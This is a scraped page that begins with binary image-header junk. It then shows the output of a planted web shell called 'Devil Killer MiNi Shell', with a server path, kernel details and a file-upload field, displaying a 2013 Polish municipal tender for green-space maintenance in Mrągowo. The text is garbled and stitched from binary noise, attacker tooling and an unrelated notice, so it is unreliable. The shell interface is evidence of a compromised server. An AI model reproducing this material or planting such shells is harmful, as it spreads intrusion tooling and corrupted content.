JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131204/500826-N-2013.html

<p class="kh_header"><b>Mrągowo: Utrzymanie i konserwacja terenów zieleni miejskiej na terenie miasta Mrągowo</b><br>
<b>Numer ogłoszenia: 500826 - 2013; data zamieszczenia: 04.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Mrągowo , ul. Królewiecka 60A, 11-700 Mrągowo, woj. warmińsko-mazurskie, tel. 89 74190 00, faks 89 7412874.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mragowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie i konserwacja terenów zieleni miejskiej na terenie miasta Mrągowo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres rzeczowy zamówienia Utrzymanie i konserwacja terenów zieleni miejskiej na terenie miasta Mrągowa  w roku 2014 obejmuje:
1. Realizację zadań będących przedmiotem zamówienia na terenach zieleni miejskiej o powierzchni 168904 m2. Zestawienie lokalizacji terenów zielonych objętych utrzymaniem stanowi Załącznik Nr 1      i Nr 2 do niniejszej umowy.
2. Zakres rzeczowy prac konserwacyjno-pielęgnacyjnych obejmuje w szczególności: utrzymanie           w sprawności budowli, urządzeń i obiektów małej architektury zlokalizowanych na ww. terenach, w tym między innymi: ławek, koszy na odpady, zadaszeń, fontann, murków oporowych, instalacji odwadniającej teren, pomników i obelisków, stojaków na rowery, ogrodzeń, ciągów pieszych utwardzonych i nieutwardzonych, obrzeży trawnikowych. Ponoszenie opłat za dostarczoną do fontann     i obelisków wodę  (w ciągu roku dostarczono 250 m3 wody) i  energię elektryczną (zużycie w okresie od 1 września 2012 do 31 sierpnia 2013 wynosiło 20 000 kWh) potrzebną do funkcjonowania budowli, urządzeń i elementów architektury wraz z utrzymaniem instalacji elektrycznej i wodnej niezbędnej do ich funkcjonowania. Dbałość o utrzymanie czystości toni wodnej oraz bieżące kontrolowanie poziomu wody w jez. Magistrackim przy  współpracy z konserwatorem sieci burzowej w mieście. Zagospodarowanie własnym staraniem i na własny koszt odpadów powstałych z prowadzonej działalności. Zgłaszanie dewastacji i kradzieży elementów wyposażenia obiektów organom ścigania.
3.Wykaz rzeczowy prac wchodzących w zakres wynagrodzenia ryczałtowego dla obiektów zgodnie
z Załącznikiem Nr 1:
1) Kompleksowa pielęgnacja różanek, bylin, roślin cebulowych, itp.:
   - dosadzenie do 30 maja 2014r.,  bylin na klombie na Pl. Kajki, w pobliżu banku PKO S.A., 
     na powierzchni 4,5 m2.Proponowane rośliny: przetacznik kłosowy o kwiatach  intensywnie
     niebieskich Godness Grows,kostrzewa popielata, kocimiętka Faassena.
    - odkrycie, rozkopczykowanie, przycięcie - 1x w roku wiosną,
    - pielenie , spulchnianie  w okresie wegetacji  - co dwa tygodnie,
    - nawożenie  w okresie wegetacji - 2 x w roku: wiosną i latem,
    - podlewanie w okresie suszy - 1 x na tydzień,
    - usuwanie przekwitłych kwiatostanów - 2 x w miesiącu,
    - wykonywanie zabiegów ochrony roślin przed chorobami i szkodnikami w chwili zauważenia pierwszych objawów - 3 x w okresie wegetacji
    - przesadzanie i rozsadzanie - 1 x w roku wiosną lub jesienią, do 70 szt./rok
    - kopczykowanie i okrycie - 1 x w roku jesienią.
2) Wykonanie nasadzeń jednorocznych i pielęgnacja na wskazanych rabatach, w wieżach kwiatowych oraz donicach (wiszących i  betonowych):
    - uzupełnienie ziemi na rabatach - 1 x w roku przed wykonaniem nasadzeń,(do 10 t/rok)
    - wypełnienie  lub uzupełnienie ziemią donic (betonowych i wiszących oraz wież kwiatowych) - 1 x 
       w roku przed wykonaniem nasadzeń, (do 1t/rok)
    - wykonanie nasadzeń:
a) na rabatach o powierzchni 540 m2 (zgodnie z załącznikiem nr 1 do umowy), kwiaty jednoroczne 
    w fazie kwitnienia rozkrzewione, zdrowe, bez uszkodzeń mechanicznych,  gęstość sadzenia 12x12
   cm, gat. do uzgodnienia, w (średniej) cenie do 2,50 zł/szt.
b) w donicach wiszących:
   639 szt. kwiatów zwisających do uzgodnienia, w cenie do 6 zł/szt. (189 donic x 3 szt. kwiatów + 12
  donic  o podwójnym dnie  x 6 szt. kwiatów)
c) w wieżach kwiatowych:
   520 szt. kwiatów zwisających do uzgodnienia, w cenie do 6 zł/szt.   (3 wieże H 1200 x 90 szt. + 5
  wież H1100 x 50 szt.)
d) w donicach betonowych przy ul. Żeromskiego (parking)
   246 szt. begonii stalekwitnącej i plektrantusa 
- na bieżąco uzupełnianie wypadów i skradzionych nasadzeń, (do 100 szt. skradzionych nasadzeń 
  na koszt wykonawcy , powyżej tej liczby na koszt zamawiającego) Kradzież potwierdzona zgłoszeniem 
  na Policji.
 - dosadzenie do rosnących iglaków w donicach betonowych (kwadratowych) roślin sezonowych
    wg.  sugerowanych gat. : plektrantus w odmianach, helichrysum petiolatum - 92 szt.
 - zastosowanie w czasie sadzenia nawozu wolnodziałającego np. Osmocote w donicach i  wieżach 
   w dawce 3 -3,5 g/dm3,
 - nawożenie rabat 2 x w okresie wegetacji (na początku lipca i sierpnia), w dawkach zalecanych przez producenta,
 - pielenie nasadzeń  2 x w miesiącu,
- usuwanie przekwitłych kwiatostanów 2 x w miesiącu,
- podlewanie w okresie suszy nasadzeń w gruncie 2 x w tygodniu, nasadzeń w donicach i wieżach 3 x w tygodniu,
- wykonywanie zabiegów ochrony roślin przed chorobami i szkodnikami w chwili zauważenia pierwszych objawów - 3 x w okresie wegetacji
-  likwidacja nasadzeń 1 x w roku jesienią.
3) Kompleksowa pielęgnacja trawników:
   - wiosenne grabienie połączone z aeracją i wertykulacją  1 x w roku wiosną
   - nawożenie 2 x w roku wiosną i latem (specjalnymi nawozami do nawożenia wiosennego i letniego), w dawkach podanych przez producenta,
   - koszenie 2 x w maju, 3 x w czerwcu, 3 x w lipcu, 3 x w sierpniu, 2 x we wrześniu,  jeżeli zajdzie potrzeba 1 x w październiku. Koszenie przy wykorzystaniu kosiarek z funkcją mulczowania.
    W sytuacjach awaryjnych i przy zbyt wilgotnej trawie dopuszczone jest  stosowanie zwykłych kosiarek tj. bez funkcji mulczowania. 
  - podlewanie w okresie suszy 1 x w tygodniu,
  - zwalczanie chwastów 2 x w okresie wegetacji,
  - utrzymywanie krawędzi trawnika przy ciągach komunikacyjnych 1 x w miesiącu
  - dosiewanie trawy w miejscach zniszczonych i wydeptanych 1 x w okresie wegetacji, do 70m2/rok
  - bieżące jesienne wygrabianie opadłych liści  przewidywana ilość 200m3.  
Wykonawca zobowiązany jest do usuwania dołów kopanych przez psy oraz kopczyków usypywanych przez krety, nornice itp.
4) Kompleksowa pielęgnacja  krzewów ozdobnych:
     - uzupełnianie wiosną ziemi w misach wokół krzewów ozdobnych rosnących na zieleńcach wokół 
      J. Magistrackiego, Pl. PCK, Pl. Kajki i  przy ul. Krakowskiej - 5t/rok
    - pielenie i  spulchnianie ziemi  2 x w miesiącu,
    - nawożenie 2 x w okresie wegetacji (wiosną i latem),
    - podlewanie w okresie suszy 1 x w tygodniu,
    - formowanie żywopłotów 3 x w roku,
    - cięcia odmładzające i formujące 1 x w roku w terminie zależnym od grupy do której należą poszczególne krzewy,
   - cięcia sanitarne w miarę potrzeb 1 x w miesiącu,
   - usuwanie przekwitłych kwiatostanów 1 x w miesiącu,
  - wykonywanie zabiegów ochrony roślin przed chorobami i szkodnikami w chwili zauważenia pierwszych objawów - 3 x w okresie wegetacji,
  - przesadzanie roślin we wskazane miejsce 1 x w roku, do 70 szt./rok.
5) Pielęgnacja zieleni wysokiej:
    - usuwanie odrostów przy drzewach 2 x w roku,
    - formowanie drzew, które były dotychczas formowane  2 x w roku,
    - pielenie mis wokół młodych drzewek 2 x w okresie wegetacji,
    - podlewanie młodych drzewek w okresie wegetacji 2 x w miesiącu,
    - wykonywanie zabiegów ochrony roślin przed chorobami i szkodnikami w chwili zauważenia pierwszych objawów - 2 x w okresie wegetacji.
6) Utrzymanie ciągów komunikacyjnych wraz z krawężnikami i obrzeżami:
    a) alejki gruntowe (Park im. Gen. Wł. Sikorskiego, ul. Grunwaldzka, Pl. Armii Krajowej):
    - wyrównanie nawierzchni  3 x w roku,
    - pielenie i grabienie  2 x w miesiącu,
    - odśnieżanie i usuwanie śliskości, przez posypanie piaskiem bez użycia soli!  codziennie w okresie 
      zimy, jeśli wymagają tego warunki 
    b) chodniki i aleje utwardzone oraz schody:
     - zamiatanie co drugi dzień, łącznie z wymiataniem piasku i nieczystości spod ławek i koszy 
       na odpady,
     - odchwaszczanie i usuwanie mchu 2 x w miesiącu,
     - odśnieżanie i usuwanie śliskości przez posypanie piaskiem bez użycia soli! codziennie w okresie
        zimy,
     - pozimowe oczyszczenie z piasku, 
     - mycie ciśnieniowe wodą wg. potrzeb - do 20m2/rok
     - remonty bieżące nawierzchni (w tym uzupełnienia) - do 10m2/rok
   c) alejki wykonane z drobnego kamienia:
     - oczyszczanie (łącznie z niedopałkami papierosów i kapslami) prowadzić ręcznie co drugi dzień,
     - odchwaszczanie 2 x w miesiącu,
     - odśnieżanie i usuwanie śliskości przez posypanie piaskiem bez użycia soli! codziennie w okresie
       zimy.
       Zimowe utrzymanie ciągów pieszych należy ukończyć do godz. 10.
Uwaga : 
Zabrania się wmiatania i zagrabiania piasku, drobnego kamienia i nieczystości z alejek na trawnik. ! ! !
7) Utrzymanie fontann:
     - oczyszczanie z zanieczyszczeń - codziennie,
     - utrzymanie we właściwym stanie estetycznym powierzchni figur zdobiących fontanny,
     - wymiana wody 2 x w miesiącu,  Zamawiający zastrzega sobie prawo do zwiększenia częstotliwości wymiany wody w miarę potrzeb,
     - oczyszczanie dna i boków basenów fontann oraz podstawy rzeźb z glonów, kamienia 
       2 x w miesiącu, podczas wymiany wody.
     - kontrola sprawności instalacji wodnej, przepłukiwanie dysz, filtrów i wykonywanie innych
       zabiegów niezbędnych do prawidłowej eksploatacji urządzeń 1 x w tygodniu,
    - montaż, demontaż i przechowywanie urządzeń w okresie zimy.
    - uruchamianie i utrzymanie w ciągłej sprawności instalacji fontann w okresie : od 1 maja do 15
      października,
8) Bieżące prace porządkowe dla obiektów z Załącznika Nr 1 i Nr 2
    - opróżnianie koszy na odpady codziennie do godz. 10, w okresie letnim 2 x dziennie rano 
       i popołudniu, (odpady - 276,17Mg w roku)
    -  oczyszczanie ławek parkowych i koszy z zanieczyszczeń (nalepek, napisów, glonów) - na bieżąco
     Ilość ławek -238  szt. Lokalizacja ławek: teren wokół J. Magistrackiego, Pl. Unii Europejskiej, 
     Pl. Jana Pawła II, Park im. Gen. Wł. Sikorskiego, ul. Krakowska, Pl. PCK, ul. Sienkiewicza 12, 
     ul. Grunwaldzka, ul. Armii Krajowej, Brzozowa, k/Sądu
     Ilość koszy - 171 szt. Lokalizacja: teren wokół J. Magistrackiego, Pl. Unii Europejskiej, Pl. Jana     Pawła II, Park im. Gen. Wł. Sikorskiego, ul. Krakowska, Pl. PCK,  ul. Sienkiewicza 12, 
     ul. Grunwaldzka, ul. Armii Krajowej, k/ Sądu.
   - mycie i dezynfekcja koszy na odpady (w środku !) - 1 x w miesiącu, w okresie: V-VIII co 2  tygodnie.
    - powierzchniowe oczyszczanie terenów objętych umową z zanieczyszczeń codziennie do godz. 10 !
    - utrzymywanie porządku w czasie trwania imprez organizowanych na terenach objętych umową oraz w ich pobliżu (tj. jeżeli impreza odbywa się na Pl. Unii Europejskiej to teren w pobliżu na którym również trzeba utrzymywać porządek to teren wokół J. Magistrackiego), również w dni wolne od pracy. Imprezy odbywają się od ostatniego weekendu czerwca do ostatniego weekendu sierpnia oraz dodatkowo 4 dowolne imprezy w innych terminach.
   - chemiczne usuwanie plam olejowych i innych podobnych zanieczyszczeń z ciągów komunikacyjnych
      i schodów, środkiem dostępnym na rynku, który nie uszkadzania nawierzchni, do 150m2/rok.
    - likwidacja innych zanieczyszczeń w ciągu 4 godzin od zgłoszenia,
    - likwidacja dzikich wysypisk śmieci z terenów objętych umową 1 x w miesiącu,
    - oczyszczanie murków zlokalizowanych na terenach objętych umową z zanieczyszczeń (między 
       innymi z odchodów ptasich, glonów, mchów) codziennie.
    - oczyszczanie wpustów i przykanalików kanalizacji deszczowej, zlokalizowanych na terenach
      objętych umową - 2 x w sezonie (wiosna, jesień).
9)   Utrzymanie skarp i toni wodnej zbiorników i cieków  znajdujących się na  terenach objętych
      umową, a w szczególności :
    - utrzymanie skarp wokół J. Magistrackiego, tj. koszenie, wygrabianie, w przypadku powstania wyrw
      spowodowanych roztopami wiosennymi lub intensywnymi opadami deszczu - doprowadzenie do
      stanu pierwotnego
      - usuwanie wszelkich zanieczyszczeń  w strefie przybrzeżnej - na bieżąco,
10) Utrzymanie w należytym stanie technicznym urządzeń i obiektów zlokalizowanych na terenach 
      objętych umową, po przez:
    - zapewnienie prawidłowości funkcjonowania i sprawności użytkowej instalacji elektroenergetycznej 
     i wodnej, niezbędnych do funkcjonowania fontann, oświetlenia i podświetlenia obiektów i urządzeń.
     Oferent zapewni profesjonalną obsługę urządzeń technicznych.
    - wykonywanie drobnych prac naprawczych i remontowych niezbędnych do prawidłowego
      funkcjonowania urządzeń (tj. fontann, oświetlenia fontann, oświetlenia ziemnego), do  kwoty 1000
      zł netto, powyżej  tej kwoty naprawy będą wykonywane na koszt zamawiającego,
    - naprawy wynikające z aktów wandalizmu i kradzieży,  będą wykonywane na koszt Zamawiającego, wymagane jest zgłoszenie na policję,
    - uzupełnianie brakujących, wymiana uszkodzonych i zniszczonych desek w ławkach (do 20 szt./rok) i  koszach na śmieci (do 20 szt./rok)  na bieżąco,   
    - naprawa uszkodzonych i uzupełnianie skradzionych wkładów do koszy na śmieci  na bieżąco, do 50 szt. wkładów / rok
   - bieżące utrzymywanie słupków  zlokalizowanych  przy Warszawskiej w pozycji pionowej.
4.Wykaz rzeczowy prac wchodzących w zakres wynagrodzenia ryczałtowego dla terenów zgodnie            z Załącznikiem Nr 2:
1) Pielęgnacja trawników
- koszenie 1 x w miesiącu od maja do października. Koszenie z zastosowaniem kosiarek          
  z funkcją mulczowania. W przypadku koszenia (skarpy) kosami mechanicznymi - wygrabienie
  trawy z trawników,
          - jesienne wygrabianie opadłych liści przewidywana ilość 50 m3 
Wykonawca zobowiązany jest do usuwania dołów kopanych przez psy oraz kopczyków usypywanych przez krety, nornice itp.
 2) Kompleksowa pielęgnacja  krzewów ozdobnych:
    - pielenie, spulchnianie ziemi  1 x w miesiącu,
   - formowanie żywopłotów 3 x w roku,
   - cięcia odmładzające i formujące 1 x w roku w terminie zależnym od grupy do której należą poszczególne krzewy,
  - wykonywanie zabiegów ochrony roślin przed chorobami i szkodnikami w chwili zauważenia pierwszych objawów - 2 razy w okresie wegetacji,
3) Pielęgnacja zieleni wysokiej:
    - pielenie mis wokół młodych drzewek 2 x w okresie wegetacji,
    - wykonywanie zabiegów ochrony roślin przed chorobami i szkodnikami w chwili zauważenia pierwszych objawów - 2 razy w okresie wegetacji,
 4) Utrzymanie ciągów komunikacyjnych (w tym schodów) wraz z krawężnikami i obrzeżami:
     - zamiatanie co drugi dzień, łącznie z wymiataniem piasku i nieczystości spod ławek i koszy 
       na odpady,
     - odchwaszczanie  1 x w miesiącu,
     - odśnieżanie i usuwanie śliskości przez posypanie piaskiem bez użycia soli! codziennie w okresie
        zimy,
     - pozimowe oczyszczenie z piasku,
       Zimowe utrzymanie ciągów pieszych należy ukończyć do godz. 10.
5. Zakres prac nie wchodzących w zakres ryczałtu, rozliczany będzie wg potrzeb na podstawie
    protokołu konieczności, cenami jednostkowymi  i  obejmuje:
1/ budowę 1 m2 trawnika,
2/ przebudowę  1m2 trawnika polegającą na zdarciu istniejącej darni, wymianie  podłoża  na głębokość 
    20 cm i założeniu nowego trawnika (planowana jest przebudowa trawnika przy ul. Warszawskiej 
    k/ fontanny)
3/ malowanie  1 szt. ławki
a)	drewnianej z elementami żeliwnymi
b)	drewnianej z elementami betonowymi
4/ malowanie 1 szt. kosza na śmieci
a)	drewnianego z elementami żeliwnymi
b)	drewnianego z elementami betonowymi
5/ malowanie 1 mb poręczy
 6/ stawka roboczogodziny na inne roboty nie objęte specyfikacją, ale powiązane z realizacją zadań, rozliczane będą wg ustalonej stawki roboczogodziny, (stawka do celów kosztorysowych                  z uwzględnieniem kosztów ogólnych, kosztów zakupu materiałów i zysku np. w przypadku zlecenia nasadzenia krzewów ozdobnych będzie to zakup krzewów, żyznego podłoża). 
7/ bieżące utrzymanie i konserwacja 1 m2 urządzonego terenu zieleni ( zakres prac do realizacji taki  jak w pkt.3, wchodzących w zakres wynagrodzenia ryczałtowego)
8/  koszenie, wygrabienie i wywóz trawy z  100m2 trawnika.
9/ usuwanie glonów i innej roślinności zarastającej zbiorniki wodne - za 1m3 zebranych roślin.
10/ naprawa skarpy  poprzez uzupełnienie ubytków czarnoziemem i zastosowanie biowłókniny zawierającej nasiona trawy - za 10 m2
11/oczyszczanie powierzchniowe - za 10m2
12/ utrzymanie zimowe ciągu komunikacyjnego tj. odśnieżanie i usuwanie śliskości przez posypanie piaskiem - za 10m2
6. Wykonanie wiosną w roku 2014, w terminie do 30 maja, następujących zadań:
    1) uzupełnienie nasadzeń krzewów na rabatach przy ul. Krakowskiej.
       Tawuła japońska - 23 szt. odm Goldmound, berberys Thunberga - 13 szt.  
       i berberys Julianny - 10 szt.
    2) uzupełnienie  grysu na alejkach  wykonanych z tego materiału i zlokalizowanych 
       przy J. Magistrackim, (ok. 6 t).
Ceny jednostkowe prac wymienionych w ust.  5 i 6  obejmują również koszty zakupu materiałów niezbędnych do realizacji zamówienia, koszty niezbędnych nakładów na podstawowe prace pielęgnacyjne w okresie 1 roku kalendarzowego (tzw. przyjęcie się materiału roślinnego) oraz zabezpieczenie przed zniszczeniem, kradzieżą i uprzątnięcie terenu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie:
1. Oświadczenia

Zamawiający dokona oceny spełnienia warunków na podstawie złożonych dokumentów. Z treści złożonych oświadczeń i dokumentów musi wynikać jednoznacznie, że warunki wykonawca spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie:
1. Oświadczenia
2. Wykazu wykonanych usług w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane należycie - spełnieniem tego warunku będzie wykonanie minimum jednej tego typu usługi
Zamawiający dokona oceny spełnienia warunków na podstawie złożonych dokumentów. Z treści złożonych oświadczeń i dokumentów musi wynikać jednoznacznie, że warunki wykonawca spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie:
1. Oświadczenia
2. Wykazu niezbędnych do wykonania narzędzi i urządzeń, jakimi dysponuje wykonawca (oryginał). Spełnieniem tego warunku będzie dysponowanie:
Rodzaj wymaganych urządzeń i narzędzi / Wymagane minimum na jeden obiekt
1.	Kosiarka spalinowa z funkcją mulczowania - szt.	1,
2.	Kosiarka spalinowa	- szt. 1,
3.	Wykaszarka (kosa spalinowa) - szt. 1,
4.	Siewniczek do nawozów - szt. 1,
5.	Opryskiwacz - szt. 1,
6.	Narzędzia :	
	a) grabie szt. - 3,
	b) motyczki szt. - 2,
	c) pazurki - szt. 2,
	d) konewka - szt.	1,
7.	Sekatory różne - szt. 2,
	nożyce do cięcia żywopłotu (spalinowe, ręczne)	- szt. 1,
8.	Instalacja do podlewania kwietników wiszących	 - 1,
9.	Instalacje ogrodowe do podlewania trawników (z wykorzystaniem wody ze zbiornika wodnego) - 2,
10.	Wertykulator, areator - 1,
11.	Myjka ciśnieniowa	- 1,

Zamawiający dokona oceny spełnienia warunków na podstawie złożonych dokumentów. Z treści złożonych oświadczeń i dokumentów musi wynikać jednoznacznie, że warunki wykonawca spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie:
1. Oświadczenia
2. Wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacje o podstawie dysponowania tymi osobami - Spełnieniem tego warunku będzie dysponowanie minimum 1 osobą o wykształceniu ogrodniczym lub kierunkach pokrewnych, np. architektura krajobrazu.
Zamawiający dokona oceny spełnienia warunków na podstawie złożonych dokumentów. Z treści złożonych oświadczeń i dokumentów musi wynikać jednoznacznie, że warunki wykonawca spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie:
1. Oświadczenia

Zamawiający dokona oceny spełnienia warunków na podstawie złożonych dokumentów. Z treści złożonych oświadczeń i dokumentów musi wynikać jednoznacznie, że warunki wykonawca spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
